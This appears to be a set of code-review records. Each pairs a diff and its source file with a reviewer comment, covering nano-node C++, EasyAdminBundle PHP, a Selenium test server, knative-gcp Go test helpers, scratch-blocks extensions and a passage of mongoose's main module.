const & hash_a) { auto existing (inactive_votes_cache.get<nano::gap_cache::tag_hash> ().find (hash_a)); if (existing != inactive_votes_cache.get<nano::gap_cache::tag_hash> ().end ()) { return *existing; } else { return nano::gap_information{ std::chrono::steady_clock::time_point{}, 0, std::vector<nano::account>{} }; } } void nano::active_transactions::erase_inactive_votes_cache (nano::block_hash const & hash_a) { auto existing (inactive_votes_cache.get<nano::gap_cache::tag_hash> ().find (hash_a)); if (existing != inactive_votes_cache.get<nano::gap_cache::tag_hash> ().end ()) { inactive_votes_cache.get<nano::gap_cache::tag_hash> ().erase (existing); } } size_t nano::active_transactions::dropped_elections_cache_size () { nano::lock_guard<std::mutex> guard (mutex); return dropped_elections_cache.size (); } void nano::active_transactions::add_dropped_elections_cache (nano::qualified_root const & root_a) { assert (!mutex.try_lock ()); dropped_elections_cache.get<tag_sequence> ().emplace_back (nano::election_timepoint{ std::chrono::steady_clock::now (), root_a }); if (dropped_elections_cache.size () > dropped_elections_cache_max) { dropped_elections_cache.get<tag_sequence> ().pop_front (); } } std::chrono::steady_clock::time_point nano::active_transactions::find_dropped_elections_cache (nano::qualified_root const & root_a) { assert (!mutex.try_lock ()); auto existing (dropped_elections_cache.get<tag_root> ().find (root_a)); if (existing != dropped_elections_cache.get<tag_root> ().end ()) { return existing->time; } else { return std::chrono::steady_clock::time_point{}; } } nano::cementable_account::cementable_account (nano::account const & account_a, size_t blocks_uncemented_a) : account (account_a), blocks_uncemented (blocks_uncemented_a) { } std::unique_ptr<nano::container_info_component> nano::collect_container_info (active_transactions & active_transactions, const std::string & name) { size_t roots_count; size_t blocks_count; size_t confirmed_count; size_t pending_conf_height_count; { nano::lock_guard<std::mutex> guard (active_transactions.mutex); roots_count = active_transactions.roots.size (); blocks_count = active_transactions.blocks.size (); confirmed_count = active_transactions.confirmed.size (); pending_conf_height_count = active_transactions.pending_conf_height.size (); } auto composite = std::make_unique<container_info_composite> (name); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "roots", roots_count, sizeof (decltype (active_transactions.roots)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "blocks", blocks_count, sizeof (decltype (active_transactions.blocks)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "pending_conf_height", pending_conf_height_count, sizeof (decltype (active_transactions.pending_conf_height)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "confirmed", confirmed_count, sizeof (decltype (active_transactions.confirmed)::value_type) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "priority_wallet_cementable_frontiers_count", active_transactions.priority_wallet_cementable_frontiers_size (), sizeof (nano::cementable_account) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "priority_cementable_frontiers_count", active_transactions.priority_cementable_frontiers_size (), sizeof (nano::cementable_account) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "inactive_votes_cache_count", active_transactions.inactive_votes_cache_size (), sizeof (nano::gap_information) })); composite->add_component (std::make_unique<container_info_leaf> (container_info{ "dropped_elections_count", active_transactions.dropped_elections_cache_size (), sizeof (nano::election_timepoint) })); return composite; }
1
16,170
Could use election from `info_a.election`, or is this deliberate?
nanocurrency-nano-node
cpp
@@ -95,6 +95,15 @@ class EasyAdminExtension extends AbstractTypeExtension { return LegacyFormHelper::getType('form'); } + + /** + * {@inheritdoc} + */ + public static function getExtendedTypes() + { + // needed to avoid a deprecation when using Symfony 4.2 + return [LegacyFormHelper::getType('form')]; + } } class_alias('EasyCorp\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', 'JavierEguiluz\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', false);
1
<?php /* * This file is part of the EasyAdminBundle. * * (c) Javier Eguiluz <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace EasyCorp\Bundle\EasyAdminBundle\Form\Extension; use EasyCorp\Bundle\EasyAdminBundle\Form\Util\LegacyFormHelper; use Symfony\Component\Form\AbstractTypeExtension; use Symfony\Component\Form\FormInterface; use Symfony\Component\Form\FormView; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\RequestStack; /** * Extension that injects EasyAdmin related information in the view used to * render the form. * * @author Maxime Steinhausser <[email protected]> */ class EasyAdminExtension extends AbstractTypeExtension { /** @var Request|null */ private $request; /** @var RequestStack|null */ private $requestStack; /** * @param RequestStack|null $requestStack */ public function __construct(RequestStack $requestStack = null) { $this->requestStack = $requestStack; } /** * {@inheritdoc} */ public function finishView(FormView $view, FormInterface $form, array $options) { if (null !== $this->requestStack) { $this->request = $this->requestStack->getCurrentRequest(); } if (null === $this->request) { return; } if ($this->request->attributes->has('easyadmin')) { $easyadmin = $this->request->attributes->get('easyadmin'); $entity = $easyadmin['entity']; $action = $easyadmin['view']; $fields = isset($entity[$action]['fields']) ? $entity[$action]['fields'] : array(); $view->vars['easyadmin'] = array( 'entity' => $entity, 'view' => $action, 'item' => $easyadmin['item'], 'field' => null, 'form_group' => $form->getConfig()->getAttribute('easyadmin_form_group'), 'form_tab' => $form->getConfig()->getAttribute('easyadmin_form_tab'), ); /* * Checks if current form view is direct child on the topmost form * (ie. this form view`s field exists in easyadmin configuration) */ if (null !== $view->parent && null === $view->parent->parent) { $view->vars['easyadmin']['field'] = isset($fields[$view->vars['name']]) ? $fields[$view->vars['name']] : null; } } } /** * BC for SF < 2.4. * To be replaced by the usage of the request stack when 2.3 support is dropped. * * @param Request|null $request */ public function setRequest(Request $request = null) { $this->request = $request; } /** * {@inheritdoc} */ public function getExtendedType() { return LegacyFormHelper::getType('form'); } } class_alias('EasyCorp\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', 'JavierEguiluz\Bundle\EasyAdminBundle\Form\Extension\EasyAdminExtension', false);
1
11,653
looks like this should be `return array(LegacyFormHelper::getType('form'));`
EasyCorp-EasyAdminBundle
php
@@ -52,6 +52,8 @@ var Server = function(requestHandler) { * with the server host when it has fully started. */ this.start = function(opt_port) { + assert(typeof opt_port !== 'function', + "start invoked with function, not port (mocha callback)?"); var port = opt_port || portprober.findFreePort('localhost'); return promise.when(port, function(port) { return promise.checkedNodeCall(
1
// Copyright 2013 Selenium committers // Copyright 2013 Software Freedom Conservancy // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. 'use strict'; var assert = require('assert'), http = require('http'), url = require('url'); var net = require('../../net'), portprober = require('../../net/portprober'), promise = require('../..').promise; /** * Encapsulates a simple HTTP server for testing. The {@code onrequest} * function should be overridden to define request handling behavior. * @param {function(!http.ServerRequest, !http.ServerResponse)} requestHandler * The request handler for the server. * @constructor */ var Server = function(requestHandler) { var server = http.createServer(function(req, res) { requestHandler(req, res); }); server.on('connection', function(stream) { stream.setTimeout(4000); }); /** @typedef {{port: number, address: string, family: string}} */ var Host; /** * Starts the server on the given port. If no port, or 0, is provided, * the server will be started on a random port. * @param {number=} opt_port The port to start on. * @return {!webdriver.promise.Promise.<Host>} A promise that will resolve * with the server host when it has fully started. */ this.start = function(opt_port) { var port = opt_port || portprober.findFreePort('localhost'); return promise.when(port, function(port) { return promise.checkedNodeCall( server.listen.bind(server, port, 'localhost')); }).then(function() { return server.address(); }); }; /** * Stops the server. * @return {!webdriver.promise.Promise} A promise that will resolve when the * server has closed all connections. */ this.stop = function() { var d = promise.defer(); server.close(d.fulfill); return d.promise; }; /** * @return {Host} This server's host info. * @throws {Error} If the server is not running. */ this.address = function() { var addr = server.address(); if (!addr) { throw Error('There server is not running!'); } return addr; }; /** * return {string} The host:port of this server. * @throws {Error} If the server is not running. */ this.host = function() { return net.getLoopbackAddress() + ':' + this.address().port; }; /** * Formats a URL for this server. * @param {string=} opt_pathname The desired pathname on the server. * @return {string} The formatted URL. * @throws {Error} If the server is not running. */ this.url = function(opt_pathname) { var addr = this.address(); var pathname = opt_pathname || ''; return url.format({ protocol: 'http', hostname: net.getLoopbackAddress(), port: addr.port, pathname: pathname }); }; }; // PUBLIC API exports.Server = Server;
1
11,552
Maybe it would simpler to ignore opt_port if type !== 'number'?
SeleniumHQ-selenium
js
@@ -223,10 +223,9 @@ Blockly.ScratchBlocks.VerticalExtensions.SCRATCH_EXTENSION = function() { Blockly.ScratchBlocks.VerticalExtensions.registerAll = function() { var categoryNames = ['control', 'data', 'data_lists', 'sounds', 'motion', 'looks', 'event', - 'sensing', 'pen', 'operators', 'more']; + 'sensing', 'pen', 'operators', 'more']; // Register functions for all category colours. - for (var i = 0; i < categoryNames.length; i++) { - name = categoryNames[i]; + for (var i = 0, name; name = categoryNames[i]; i++) { Blockly.Extensions.register('colours_' + name, Blockly.ScratchBlocks.VerticalExtensions.colourHelper(name)); }
1
/** * @license * Visual Blocks Editor * * Copyright 2017 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Extensions for vertical blocks in scratch-blocks. * The following extensions can be used to describe a block in Scratch terms. * For instance, a block in the operators colour scheme with a number output * would have the "colours_operators" and "output_number" extensions. * @author [email protected] (Rachel Fenichel) */ 'use strict'; goog.provide('Blockly.ScratchBlocks.VerticalExtensions'); goog.require('Blockly.Colours'); goog.require('Blockly.constants'); /** * Helper function that generates an extension based on a category name. * The generated function will set primary, secondary, and tertiary colours * based on the category name. * @param {String} category The name of the category to set colours for. * @return {function} An extension function that sets colours based on the given * category. */ Blockly.ScratchBlocks.VerticalExtensions.colourHelper = function(category) { var colours = Blockly.Colours[category]; if (!(colours && colours.primary && colours.secondary && colours.tertiary)) { throw new Error('Could not find colours for category "' + category + '"'); } /** * Set the primary, secondary, and tertiary colours on this block for the * given category. * @this {Blockly.Block} */ return function() { this.setColourFromRawValues_(colours.primary, colours.secondary, colours.tertiary); }; }; /** * Extension to set the colours of a text field, which are all the same. */ Blockly.ScratchBlocks.VerticalExtensions.COLOUR_TEXTFIELD = function() { this.setColourFromRawValues_(Blockly.Colours.textField, Blockly.Colours.textField, Blockly.Colours.textField); }; /** * Extension to make a block fit into a stack of statements, regardless of its * inputs. That means the block should have a previous connection and a next * connection and have inline inputs. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.SHAPE_STATEMENT = function() { this.setInputsInline(true); this.setPreviousStatement(true, null); this.setNextStatement(true, null); }; /** * Extension to make a block be shaped as a hat block, regardless of its * inputs. That means the block should have a next connection and have inline * inputs, but have no previous connection. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.SHAPE_HAT = function() { this.setInputsInline(true); this.setNextStatement(true, null); }; /** * Extension to make a block be shaped as an end block, regardless of its * inputs. That means the block should have a previous connection and have * inline inputs, but have no next connection. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.SHAPE_END = function() { this.setInputsInline(true); this.setPreviousStatement(true, null); }; /** * Extension to make represent a number reporter in Scratch-Blocks. * That means the block has inline inputs, a round output shape, and a 'Number' * output type. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_NUMBER = function() { this.setInputsInline(true); this.setOutputShape(Blockly.OUTPUT_SHAPE_ROUND); this.setOutput(true, 'Number'); }; /** * Extension to make represent a string reporter in Scratch-Blocks. * That means the block has inline inputs, a round output shape, and a 'String' * output type. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_STRING = function() { this.setInputsInline(true); this.setOutputShape(Blockly.OUTPUT_SHAPE_ROUND); this.setOutput(true, 'String'); }; /** * Extension to make represent a boolean reporter in Scratch-Blocks. * That means the block has inline inputs, a round output shape, and a 'Boolean' * output type. * @this {Blockly.Block} * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_BOOLEAN = function() { this.setInputsInline(true); this.setOutputShape(Blockly.OUTPUT_SHAPE_HEXAGONAL); this.setOutput(true, 'Boolean'); }; /** * Mixin to add a context menu for a procedure definition block. * It adds the "edit" option and removes the "duplicate" option. * @mixin * @augments Blockly.Block * @package * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_DEF_CONTEXTMENU = { /** * Add the "edit" option and removes the "duplicate" option from the context * menu. * @param {!Array.<!Object>} menuOptions List of menu options to edit. * @this Blockly.Block */ customContextMenu: function(menuOptions) { // Add the edit option at the end. menuOptions.push(Blockly.Procedures.makeEditOption(this)); // Find the delete option and update its callback to be specific to // functions. for (var i = 0, option; option = menuOptions[i]; i++) { if (option.text == Blockly.Msg.DELETE_BLOCK) { var input = this.getInput('custom_block'); // this is the root block, not the shadow block. if (input && input.connection && input.connection.targetBlock()) { var procCode = input.connection.targetBlock().getProcCode(); } else { return; } var rootBlock = this; option.callback = function() { var didDelete = Blockly.Procedures.deleteProcedureDefCallback( procCode, rootBlock); if (!didDelete) { // TODO:(#1151) alert('To delete a block definition, first remove all uses of the block'); } }; } } // Find and remove the duplicate option for (var i = 0, option; option = menuOptions[i]; i++) { if (option.text == Blockly.Msg.DUPLICATE_BLOCK) { menuOptions.splice(i, 1); break; } } } }; /** * Mixin to add a context menu for a procedure call block. * It adds the "edit" option and the "define" option. * @mixin * @augments Blockly.Block * @package * @readonly */ Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_CALL_CONTEXTMENU = { /** * Add the "edit" option to the context menu. * @todo Add "go to definition" option once implemented. * @param {!Array.<!Object>} menuOptions List of menu options to edit. * @this Blockly.Block */ customContextMenu: function(menuOptions) { menuOptions.push(Blockly.Procedures.makeEditOption(this)); } }; Blockly.ScratchBlocks.VerticalExtensions.SCRATCH_EXTENSION = function() { this.isScratchExtension = true; }; /** * Register all extensions for scratch-blocks. * @package */ Blockly.ScratchBlocks.VerticalExtensions.registerAll = function() { var categoryNames = ['control', 'data', 'data_lists', 'sounds', 'motion', 'looks', 'event', 'sensing', 'pen', 'operators', 'more']; // Register functions for all category colours. for (var i = 0; i < categoryNames.length; i++) { name = categoryNames[i]; Blockly.Extensions.register('colours_' + name, Blockly.ScratchBlocks.VerticalExtensions.colourHelper(name)); } // Text fields transcend categories. Blockly.Extensions.register('colours_textfield', Blockly.ScratchBlocks.VerticalExtensions.COLOUR_TEXTFIELD); // Register extensions for common block shapes. Blockly.Extensions.register('shape_statement', Blockly.ScratchBlocks.VerticalExtensions.SHAPE_STATEMENT); Blockly.Extensions.register('shape_hat', Blockly.ScratchBlocks.VerticalExtensions.SHAPE_HAT); Blockly.Extensions.register('shape_end', Blockly.ScratchBlocks.VerticalExtensions.SHAPE_END); // Output shapes and types are related. Blockly.Extensions.register('output_number', Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_NUMBER); Blockly.Extensions.register('output_string', Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_STRING); Blockly.Extensions.register('output_boolean', Blockly.ScratchBlocks.VerticalExtensions.OUTPUT_BOOLEAN); // Custom procedures have interesting context menus. Blockly.Extensions.registerMixin('procedure_def_contextmenu', Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_DEF_CONTEXTMENU); Blockly.Extensions.registerMixin('procedure_call_contextmenu', Blockly.ScratchBlocks.VerticalExtensions.PROCEDURE_CALL_CONTEXTMENU); // Extension blocks have slightly different block rendering. Blockly.Extensions.register('scratch_extension', Blockly.ScratchBlocks.VerticalExtensions.SCRATCH_EXTENSION); }; Blockly.ScratchBlocks.VerticalExtensions.registerAll();
1
9,071
Where was `name` being declared before?
LLK-scratch-blocks
js
@@ -74,6 +74,18 @@ func (t testHelper) UnavailableDeployment() *appsv1.Deployment { return d } +func (t testHelper) UnknownDeployment() *appsv1.Deployment { + d := &appsv1.Deployment{} + d.Name = "unknown" + d.Status.Conditions = []appsv1.DeploymentCondition{ + { + Type: appsv1.DeploymentAvailable, + Status: "Unknown", + }, + } + return d +} + func (t testHelper) ReadyBrokerCellStatus() *BrokerCellStatus { bs := &BrokerCellStatus{} bs.PropagateIngressAvailability(t.AvailableEndpoints())
1
/* Copyright 2020 Google LLC. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package v1alpha1 import ( appsv1 "k8s.io/api/apps/v1" corev1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" ) type testHelper struct{} // TestHelper contains helpers for unit tests. var TestHelper = testHelper{} func (t testHelper) UnavailableEndpoints() *corev1.Endpoints { ep := &corev1.Endpoints{} ep.Name = "unavailable" ep.Subsets = []corev1.EndpointSubset{{ NotReadyAddresses: []corev1.EndpointAddress{{ IP: "127.0.0.1", }}, }} return ep } func (t testHelper) AvailableEndpoints() *corev1.Endpoints { return &corev1.Endpoints{ ObjectMeta: metav1.ObjectMeta{ Name: "available", }, Subsets: []corev1.EndpointSubset{{ Addresses: []corev1.EndpointAddress{{ IP: "127.0.0.1", }}, }}, } } func (t testHelper) AvailableDeployment() *appsv1.Deployment { d := &appsv1.Deployment{} d.Name = "available" d.Status.Conditions = []appsv1.DeploymentCondition{ { Type: appsv1.DeploymentAvailable, Status: "True", }, } return d } func (t testHelper) UnavailableDeployment() *appsv1.Deployment { d := &appsv1.Deployment{} d.Name = "unavailable" d.Status.Conditions = []appsv1.DeploymentCondition{ { Type: appsv1.DeploymentAvailable, Status: "False", }, } return d } func (t testHelper) ReadyBrokerCellStatus() *BrokerCellStatus { bs := &BrokerCellStatus{} bs.PropagateIngressAvailability(t.AvailableEndpoints()) bs.SetIngressTemplate("http://localhost") bs.PropagateFanoutAvailability(t.AvailableDeployment()) bs.PropagateRetryAvailability(t.AvailableDeployment()) bs.MarkTargetsConfigReady() return bs }
1
15,717
nit: use `corev1.ConditionUnknown`
google-knative-gcp
go
@@ -997,7 +997,10 @@ Mongoose.prototype.isValidObjectId = function(v) { v = v.toString(); } - if (typeof v === 'string' && (v.length === 12 || v.length === 24)) { + if (typeof v === 'string' && v.length === 12) { + return true; + } + if (typeof v === 'string' && v.length === 24 && /^[a-f0-9]*$/.test(v)) { return true; }
1
'use strict'; /*! * Module dependencies. */ if (global.MONGOOSE_DRIVER_PATH) { const deprecationWarning = 'The `MONGOOSE_DRIVER_PATH` global property is ' + 'deprecated. Use `mongoose.driver.set()` instead.'; const setDriver = require('util').deprecate(function() { require('./driver').set(require(global.MONGOOSE_DRIVER_PATH)); }, deprecationWarning); setDriver(); } else { require('./driver').set(require('./drivers/node-mongodb-native')); } const Document = require('./document'); const Schema = require('./schema'); const SchemaType = require('./schematype'); const SchemaTypes = require('./schema/index'); const VirtualType = require('./virtualtype'); const STATES = require('./connectionstate'); const VALID_OPTIONS = require('./validoptions'); const Types = require('./types'); const Query = require('./query'); const Model = require('./model'); const applyPlugins = require('./helpers/schema/applyPlugins'); const get = require('./helpers/get'); const promiseOrCallback = require('./helpers/promiseOrCallback'); const legacyPluralize = require('mongoose-legacy-pluralize'); const utils = require('./utils'); const pkg = require('../package.json'); const cast = require('./cast'); const removeSubdocs = require('./plugins/removeSubdocs'); const saveSubdocs = require('./plugins/saveSubdocs'); const trackTransaction = require('./plugins/trackTransaction'); const validateBeforeSave = require('./plugins/validateBeforeSave'); const Aggregate = require('./aggregate'); const PromiseProvider = require('./promise_provider'); const shardingPlugin = require('./plugins/sharding'); const defaultMongooseSymbol = Symbol.for('mongoose:default'); require('./helpers/printJestWarning'); /** * Mongoose constructor. * * The exports object of the `mongoose` module is an instance of this class. * Most apps will only use this one instance. * * ####Example: * const mongoose = require('mongoose'); * mongoose instanceof mongoose.Mongoose; // true * * // Create a new Mongoose instance with its own `connect()`, `set()`, `model()`, etc. * const m = new mongoose.Mongoose(); * * @api public * @param {Object} options see [`Mongoose#set()` docs](/docs/api/mongoose.html#mongoose_Mongoose-set) */ function Mongoose(options) { this.connections = []; this.models = {}; this.modelSchemas = {}; // default global options this.options = Object.assign({ pluralization: true }, options); const conn = this.createConnection(); // default connection conn.models = this.models; if (this.options.pluralization) { this._pluralize = legacyPluralize; } // If a user creates their own Mongoose instance, give them a separate copy // of the `Schema` constructor so they get separate custom types. (gh-6933) if (!options || !options[defaultMongooseSymbol]) { const _this = this; this.Schema = function() { this.base = _this; return Schema.apply(this, arguments); }; this.Schema.prototype = Object.create(Schema.prototype); Object.assign(this.Schema, Schema); this.Schema.base = this; this.Schema.Types = Object.assign({}, Schema.Types); } else { // Hack to work around babel's strange behavior with // `import mongoose, { Schema } from 'mongoose'`. Because `Schema` is not // an own property of a Mongoose global, Schema will be undefined. See gh-5648 for (const key of ['Schema', 'model']) { this[key] = Mongoose.prototype[key]; } } this.Schema.prototype.base = this; Object.defineProperty(this, 'plugins', { configurable: false, enumerable: true, writable: false, value: [ [saveSubdocs, { deduplicate: true }], [validateBeforeSave, { deduplicate: true }], [shardingPlugin, { deduplicate: true }], [removeSubdocs, { deduplicate: true }], [trackTransaction, { deduplicate: true }] ] }); } Mongoose.prototype.cast = cast; /** * Expose connection states for user-land * * @memberOf Mongoose * @property STATES * @api public */ Mongoose.prototype.STATES = STATES; /** * The underlying driver this Mongoose instance uses to communicate with * the database. A driver is a Mongoose-specific interface that defines functions * like `find()`. * * @memberOf Mongoose * @property driver * @api public */ Mongoose.prototype.driver = require('./driver'); /** * Sets mongoose options * * ####Example: * * mongoose.set('test', value) // sets the 'test' option to `value` * * mongoose.set('debug', true) // enable logging collection methods + arguments to the console/file * * mongoose.set('debug', function(collectionName, methodName, ...methodArgs) {}); // use custom function to log collection methods + arguments * * Currently supported options are: * - 'debug': If `true`, prints the operations mongoose sends to MongoDB to the console. If a writable stream is passed, it will log to that stream, without colorization. If a callback function is passed, it will receive the collection name, the method name, then all arugments passed to the method. For example, if you wanted to replicate the default logging, you could output from the callback `Mongoose: ${collectionName}.${methodName}(${methodArgs.join(', ')})`. * - 'returnOriginal': If `false`, changes the default `returnOriginal` option to `findOneAndUpdate()`, `findByIdAndUpdate`, and `findOneAndReplace()` to false. This is equivalent to setting the `new` option to `true` for `findOneAndX()` calls by default. Read our [`findOneAndUpdate()` tutorial](/docs/tutorials/findoneandupdate.html) for more information. * - 'bufferCommands': enable/disable mongoose's buffering mechanism for all connections and models * - 'useCreateIndex': false by default. Set to `true` to make Mongoose's default index build use `createIndex()` instead of `ensureIndex()` to avoid deprecation warnings from the MongoDB driver. * - 'useFindAndModify': true by default. Set to `false` to make `findOneAndUpdate()` and `findOneAndRemove()` use native `findOneAndUpdate()` rather than `findAndModify()`. * - 'useNewUrlParser': false by default. Set to `true` to make all connections set the `useNewUrlParser` option by default * - 'useUnifiedTopology': false by default. Set to `true` to make all connections set the `useUnifiedTopology` option by default * - 'cloneSchemas': false by default. Set to `true` to `clone()` all schemas before compiling into a model. * - 'applyPluginsToDiscriminators': false by default. Set to true to apply global plugins to discriminator schemas. This typically isn't necessary because plugins are applied to the base schema and discriminators copy all middleware, methods, statics, and properties from the base schema. * - 'applyPluginsToChildSchemas': true by default. Set to false to skip applying global plugins to child schemas * - 'objectIdGetter': true by default. Mongoose adds a getter to MongoDB ObjectId's called `_id` that returns `this` for convenience with populate. Set this to false to remove the getter. * - 'runValidators': false by default. Set to true to enable [update validators](/docs/validation.html#update-validators) for all validators by default. * - 'toObject': `{ transform: true, flattenDecimals: true }` by default. Overwrites default objects to [`toObject()`](/docs/api.html#document_Document-toObject) * - 'toJSON': `{ transform: true, flattenDecimals: true }` by default. Overwrites default objects to [`toJSON()`](/docs/api.html#document_Document-toJSON), for determining how Mongoose documents get serialized by `JSON.stringify()` * - 'strict': true by default, may be `false`, `true`, or `'throw'`. Sets the default strict mode for schemas. * - 'strictQuery': false by default, may be `false`, `true`, or `'throw'`. Sets the default [strictQuery](/docs/guide.html#strictQuery) mode for schemas. * - 'selectPopulatedPaths': true by default. Set to false to opt out of Mongoose adding all fields that you `populate()` to your `select()`. The schema-level option `selectPopulatedPaths` overwrites this one. * - 'typePojoToMixed': true by default, may be `false` or `true`. Sets the default typePojoToMixed for schemas. * - 'maxTimeMS': If set, attaches [maxTimeMS](https://docs.mongodb.com/manual/reference/operator/meta/maxTimeMS/) to every query * - 'autoIndex': true by default. Set to false to disable automatic index creation for all models associated with this Mongoose instance. * - 'autoCreate': Set to `true` to make Mongoose call [`Model.createCollection()`](/docs/api/model.html#model_Model.createCollection) automatically when you create a model with `mongoose.model()` or `conn.model()`. This is useful for testing transactions, change streams, and other features that require the collection to exist. * - 'overwriteModels': Set to `true` to default to overwriting models with the same name when calling `mongoose.model()`, as opposed to throwing an `OverwriteModelError`. * * @param {String} key * @param {String|Function|Boolean} value * @api public */ Mongoose.prototype.set = function(key, value) { const _mongoose = this instanceof Mongoose ? this : mongoose; if (VALID_OPTIONS.indexOf(key) === -1) throw new Error(`\`${key}\` is an invalid option.`); if (arguments.length === 1) { return _mongoose.options[key]; } _mongoose.options[key] = value; if (key === 'objectIdGetter') { if (value) { Object.defineProperty(mongoose.Types.ObjectId.prototype, '_id', { enumerable: false, configurable: true, get: function() { return this; } }); } else { delete mongoose.Types.ObjectId.prototype._id; } } return _mongoose; }; /** * Gets mongoose options * * ####Example: * * mongoose.get('test') // returns the 'test' value * * @param {String} key * @method get * @api public */ Mongoose.prototype.get = Mongoose.prototype.set; /** * Creates a Connection instance. * * Each `connection` instance maps to a single database. This method is helpful when managing multiple db connections. * * * _Options passed take precedence over options included in connection strings._ * * ####Example: * * // with mongodb:// URI * db = mongoose.createConnection('mongodb://user:pass@localhost:port/database'); * * // and options * const opts = { db: { native_parser: true }} * db = mongoose.createConnection('mongodb://user:pass@localhost:port/database', opts); * * // replica sets * db = mongoose.createConnection('mongodb://user:pass@localhost:port,anotherhost:port,yetanother:port/database'); * * // and options * const opts = { replset: { strategy: 'ping', rs_name: 'testSet' }} * db = mongoose.createConnection('mongodb://user:pass@localhost:port,anotherhost:port,yetanother:port/database', opts); * * // and options * const opts = { server: { auto_reconnect: false }, user: 'username', pass: 'mypassword' } * db = mongoose.createConnection('localhost', 'database', port, opts) * * // initialize now, connect later * db = mongoose.createConnection(); * db.openUri('localhost', 'database', port, [opts]); * * @param {String} [uri] a mongodb:// URI * @param {Object} [options] passed down to the [MongoDB driver's `connect()` function](http://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html), except for 4 mongoose-specific options explained below. * @param {Boolean} [options.bufferCommands=true] Mongoose specific option. Set to false to [disable buffering](http://mongoosejs.com/docs/faq.html#callback_never_executes) on all models associated with this connection. * @param {String} [options.dbName] The name of the database you want to use. If not provided, Mongoose uses the database name from connection string. * @param {String} [options.user] username for authentication, equivalent to `options.auth.user`. Maintained for backwards compatibility. * @param {String} [options.pass] password for authentication, equivalent to `options.auth.password`. Maintained for backwards compatibility. * @param {Boolean} [options.autoIndex=true] Mongoose-specific option. Set to false to disable automatic index creation for all models associated with this connection. * @param {Boolean} [options.useNewUrlParser=false] False by default. Set to `true` to make all connections set the `useNewUrlParser` option by default. * @param {Boolean} [options.useUnifiedTopology=false] False by default. Set to `true` to make all connections set the `useUnifiedTopology` option by default. * @param {Boolean} [options.useCreateIndex=true] Mongoose-specific option. If `true`, this connection will use [`createIndex()` instead of `ensureIndex()`](/docs/deprecations.html#ensureindex) for automatic index builds via [`Model.init()`](/docs/api.html#model_Model.init). * @param {Boolean} [options.useFindAndModify=true] True by default. Set to `false` to make `findOneAndUpdate()` and `findOneAndRemove()` use native `findOneAndUpdate()` rather than `findAndModify()`. * @param {Number} [options.reconnectTries=30] If you're connected to a single server or mongos proxy (as opposed to a replica set), the MongoDB driver will try to reconnect every `reconnectInterval` milliseconds for `reconnectTries` times, and give up afterward. When the driver gives up, the mongoose connection emits a `reconnectFailed` event. This option does nothing for replica set connections. * @param {Number} [options.reconnectInterval=1000] See `reconnectTries` option above. * @param {Class} [options.promiseLibrary] Sets the [underlying driver's promise library](http://mongodb.github.io/node-mongodb-native/3.1/api/MongoClient.html). * @param {Number} [options.poolSize=5] The maximum number of sockets the MongoDB driver will keep open for this connection. By default, `poolSize` is 5. Keep in mind that, as of MongoDB 3.4, MongoDB only allows one operation per socket at a time, so you may want to increase this if you find you have a few slow queries that are blocking faster queries from proceeding. See [Slow Trains in MongoDB and Node.js](http://thecodebarbarian.com/slow-trains-in-mongodb-and-nodejs). * @param {Number} [options.bufferMaxEntries] This option does nothing if `useUnifiedTopology` is set. The MongoDB driver also has its own buffering mechanism that kicks in when the driver is disconnected. Set this option to 0 and set `bufferCommands` to `false` on your schemas if you want your database operations to fail immediately when the driver is not connected, as opposed to waiting for reconnection. * @param {Number} [options.connectTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _during initial connection_. Defaults to 30000. This option is passed transparently to [Node.js' `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback). * @param {Number} [options.socketTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _after initial connection_. A socket may be inactive because of either no activity or a long-running operation. This is set to `30000` by default, you should set this to 2-3x your longest running operation if you expect some of your database operations to run longer than 20 seconds. This option is passed to [Node.js 